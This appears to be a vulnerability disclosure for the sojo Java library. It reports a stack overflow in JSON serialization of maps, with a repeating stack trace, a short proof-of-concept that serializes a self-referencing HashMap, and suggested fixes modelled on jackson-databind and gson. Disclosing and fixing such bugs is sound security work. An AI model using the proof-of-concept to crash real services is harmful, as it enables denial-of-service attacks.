Stack overflow error caused by sojo serialization Map #16
Description
Stack overflow error caused by sojo serialization Map
Description
sojo before v1.1.1 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at net.sf.sojo.interchange.json.JsonWalkerInterceptor.handleControlCharacter(JsonWalkerInterceptor.java:114)
at net.sf.sojo.interchange.json.JsonWalkerInterceptor.handleJsonValue(JsonWalkerInterceptor.java:181)
at net.sf.sojo.interchange.json.JsonWalkerInterceptor.visitElement(JsonWalkerInterceptor.java:214)
at net.sf.sojo.common.ObjectGraphWalker.fireVisitElementEvent(ObjectGraphWalker.java:80)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:139)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
PoC
<dependency>
<groupId>net.sf.sojo</groupId>
<artifactId>sojo</artifactId>
<version>1.1.1</version>
</dependency>import net.sf.sojo.interchange.json.JsonSerializer;
import java.util.HashMap;
public class PoC2 {
public static void main(String[] args) {
HashMap<String,Object> map=new HashMap<>();
map.put("t",map);
JsonSerializer jsonSerializer = new JsonSerializer();
jsonSerializer.serialize(map);
}
}Rectification Solution
-
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
-
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))